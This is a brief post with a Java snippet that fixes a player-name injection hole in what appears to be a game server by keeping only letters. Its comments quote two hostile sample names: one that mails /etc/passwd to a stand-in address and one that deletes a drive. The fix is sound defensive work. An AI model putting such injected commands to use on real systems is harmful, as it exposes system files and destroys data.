#1 Player File Vunerability

[Keith Gardner]

      // Parse entered name
        case STATE\_PARSE\_NAME:
        \{
            // Make sure name

contains only letters for fantasy names and
// to prevent
malicious input (such as the name
// "| mail -x
hacker@spoof < /etc/passwd" or
// "; deltree C:\;
mkdir C:\Hahaha")
char[] commandArray =
command.toCharArray();
command = "";
for (int i=0; i <
commandArray.length; i++) {
if
(Character.isLetter(commandArray[i])) {

command += commandArray\[i\];
                \}
            \}

// This should fix the problem. An alternative method
would be to maintain a serialized look-up table where
the server generates unique id's for player files.